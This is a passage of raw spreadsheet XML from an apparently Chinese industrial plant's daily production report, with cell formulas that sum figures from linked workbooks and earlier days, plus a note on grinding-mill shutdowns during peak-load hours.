        <v>1#磨14:30-24:00避峰停机:9.5小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]18'!$D$43+'[15]18'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]18'!$E$43+'[15]18'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'17'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]18'!$H$43+'[15]18'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'17'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]18'!$K$43+'[15]18'!$K$44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'[15]18'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]18'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'17'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]18'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'17'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]18'!$K$45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G71+'17'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'17'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]18'!$Q$80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G72+'17'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'17'!K72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G73+'17'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'17'!K73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G74+'17'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'17'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]18'!$Q$83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G75+'17'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'17'!K75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G76+'17'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'17'!K76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G77+'17'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'17'!K77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G78+'17'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'17'!K78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'[16]18'!$E$7</f>
        <v>433.8</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'17'!H79</f>
        <v>9233.06</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>156361.53</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]18'!$I$7</f>
        <v>590.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'17'!K79</f>
        <v>9189.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>151080.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]18'!$L$7</f>
        <v>4928.34</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.85668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'[16]18'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'17'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]18'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'17'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]18'!$Y$15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G81+'17'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'17'!K81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G82+'17'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'17'!K82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G83+'17'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'17'!K83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G84+'17'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'17'!K84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G85+'17'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'17'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="H29" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="R33" sqref="R33"/>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19/31</f>
        <v>0.612903225806452</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46010</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17284.54</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'18'!H5</f>
        <v>395044.41</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6549910.44</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24275.247</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'18'!K5</f>
        <v>439340.439</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6589411.57</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>223171.795</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>59.6716029411764</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]19'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]19'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]19'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]19'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]19'!$U$101</f>
        <v>50.6506578947369</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]19'!$V$101</f>
        <v>63.9080028328612</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]19'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]19'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]19'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]19'!$D$23+'[11]19'!$D$17+'[12]19'!$D$17+'[13]19'!$D$25+'[14]19'!$D$8+'[14]19'!$D$15+'[15]19'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]19'!$E$23+'[11]19'!$E$17+'[12]19'!$E$17+'[13]19'!$E$25+'[14]19'!$E$8+'[14]19'!$E$15+'[15]19'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'18'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]19'!$I$23+'[11]19'!$I$17+'[12]19'!$I$17+'[13]19'!$I$25+'[14]19'!$E$23+'[14]19'!$E$30+'[15]19'!$H$7</f>
        <v>1144.98</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'18'!K6</f>
        <v>13673.95</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>275871.65</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]19'!$L$23+'[11]19'!$L$17+'[12]19'!$L$17+'[13]19'!$L$25+'[14]19'!$H$23+'[14]19'!$H$30+'[15]19'!$K$7</f>
        <v>23866.89</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]19'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]19'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]19'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]19'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]19'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]19'!$V$102</f>
        <v>33.5835576015109</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]19'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]19'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]19'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]19'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]19'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'18'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]19'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'18'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]19'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]19'!$W$107</f>
        <v>123.638042474608</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]19'!$X$107</f>
        <v>126.429801071155</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]19'!$Y$107</f>
        <v>131.504332819952</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]19'!$T$107</f>
        <v>45.125</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]19'!$U$107</f>
        <v>45.859649122807</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]19'!$V$107</f>
        <v>31.805358829084</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]19'!$Q$107</f>
        <v>10.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]19'!$R$107</f>
        <v>209.12</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]19'!$S$107</f>
        <v>2694.55</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]19'!$D$27+'[11]19'!$D$18+'[13]19'!$D$26+'[14]19'!$D$10+'[14]19'!$D$17+'[15]19'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]19'!$E$27+'[11]19'!$E$18+'[13]19'!$E$26+'[14]19'!$E$10+'[14]19'!$E$17+'[15]19'!$E$9</f>
        <v>0</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'18'!H8</f>
        <v>42105</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>567641.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]19'!$I$27+'[11]19'!$I$18+'[13]19'!$I$26+'[14]19'!$E$25+'[14]19'!$E$32+'[15]19'!$H$9</f>
        <v>2530.16</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'18'!K8</f>
        <v>48047.52</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>555792.23</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]19'!$L$27+'[11]19'!$L$18+'[13]19'!$L$26+'[14]19'!$H$25+'[14]19'!$H$32+'[15]19'!$K$9</f>
        <v>35937.38</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]19'!$W$108</f>
        <v>139.306846999155</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]19'!$X$108</f>
        <v>132.834841310768</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]19'!$Y$108</f>
        <v>127.903126763369</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]19'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]19'!$U$108</f>
        <v>46.7785087719298</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]19'!$V$108</f>
        <v>28.4485363550519</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]19'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]19'!$R$108</f>
        <v>213.31</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]19'!$S$108</f>
        <v>2410.16</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]19'!$D$24+'[11]19'!$D$19+'[12]19'!$D$20+'[13]19'!$D$27+'[14]19'!$D$11+'[14]19'!$D$18+'[15]19'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]19'!$E$24+'[11]19'!$E$19+'[12]19'!$E$20+'[13]19'!$E$27+'[14]19'!$E$11+'[14]19'!$E$18+'[15]19'!$E$10</f>
        <v>16456</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'18'!H9</f>
        <v>284630</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4420018.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]19'!$I$24+'[11]19'!$I$19+'[12]19'!$I$20+'[13]19'!$I$27+'[14]19'!$E$26+'[14]19'!$E$33+'[15]19'!$H$10</f>
        <v>16911.907</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'18'!K9</f>
        <v>296795.809</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4394274.62</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]19'!$L$24+'[11]19'!$L$19+'[12]19'!$L$20+'[13]19'!$L$27+'[14]19'!$H$26+'[14]19'!$H$33+'[15]19'!$K$10</f>
        <v>98699.903</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]19'!$W$109</f>
        <v>244.209636517329</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]19'!$X$109</f>
        <v>272.920306410429</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]19'!$Y$109</f>
        <v>271.394269140507</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]19'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]19'!$U$109</f>
        <v>32.6359649122807</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]19'!$V$109</f>
        <v>34.7546033994334</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]19'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]19'!$R$109</f>
        <v>148.82</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]19'!$S$109</f>
        <v>2944.40999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]19'!$D$25+'[11]19'!$D$20+'[12]19'!$D$21+'[13]19'!$D$28+'[14]19'!$D$12+'[14]19'!$D$19+'[15]19'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]19'!$E$25+'[11]19'!$E$20+'[12]19'!$E$21+'[13]19'!$E$28+'[14]19'!$E$12+'[14]19'!$E$19+'[15]19'!$E$11</f>
        <v>465</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'18'!H10</f>
        <v>39885</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>957412.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]19'!$I$25+'[11]19'!$I$20+'[12]19'!$I$21+'[13]19'!$I$28+'[14]19'!$E$27+'[14]19'!$E$34+'[15]19'!$H$11</f>
        <v>2434.2</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'18'!K10</f>
        <v>54729.62</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>951958.34</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]19'!$L$25+'[11]19'!$L$20+'[12]19'!$L$21+'[13]19'!$L$28+'[14]19'!$H$27+'[14]19'!$H$34+'[15]19'!$K$11</f>
        <v>46362.322</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]19'!$W$110</f>
        <v>226.75483214649</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]19'!$X$110</f>
        <v>255.838613733351</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]19'!$Y$110</f>
        <v>268.161385812959</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]19'!$T$110</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]19'!$U$110</f>
        <v>33.9166666666667</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]19'!$V$110</f>
        <v>34.4513692162417</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]19'!$Q$110</f>
        <v>9.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]19'!$R$110</f>
        <v>154.66</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]19'!$S$110</f>
        <v>2918.72</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]19'!$D$26+'[11]19'!$D$21+'[12]19'!$D$19+'[13]19'!$D$29+'[14]19'!$D$13+'[14]19'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]19'!$E$26+'[11]19'!$E$21+'[12]19'!$E$19+'[13]19'!$E$29+'[14]19'!$E$13+'[14]19'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'18'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]19'!$I$26+'[11]19'!$I$21+'[12]19'!$I$19+'[13]19'!$I$29+'[14]19'!$E$28+'[14]19'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'18'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]19'!$L$26+'[11]19'!$L$21+'[12]19'!$L$19+'[13]19'!$L$29+'[14]19'!$H$28+'[14]19'!$H$35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6501.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'18'!H12</f>
        <v>160666.86</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5103058.11</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>13371.547</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'18'!K12</f>
        <v>317359.065</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5346465.441</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>255078.260000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>58.1043872437473</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]19'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]19'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]19'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]19'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]19'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]19'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]19'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]19'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]19'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'18'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'18'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>46.8033504587249</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]19'!$W$68</f>
        <v>270.875</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]19'!$X$68</f>
        <v>263.843243243243</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]19'!$Y$68</f>
        <v>266.228320882872</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]19'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]19'!$U$68</f>
        <v>81.140350877193</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]19'!$V$68</f>
        <v>72.0671624173749</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]19'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]19'!$R$68</f>
        <v>370.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]19'!$S$68</f>
        <v>6105.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3216</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'18'!H14</f>
        <v>54002</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1018545.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>4859.89</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'18'!K14</f>
        <v>103297.565</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1896241.671</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>59335.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]19'!$W$71</f>
        <v>235.866983372922</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]19'!$X$71</f>
        <v>219.113908727757</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]19'!$Y$71</f>
        <v>213.825968046454</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]19'!$T$71</f>
        <v>35.0833333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]19'!$U$71</f>
        <v>54.3486842105263</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]19'!$V$71</f>
        <v>50.4524315391879</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]19'!$Q$71</f>
        <v>8.42</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]19'!$R$71</f>
        <v>247.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]19'!$S$71</f>
        <v>4274.33</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
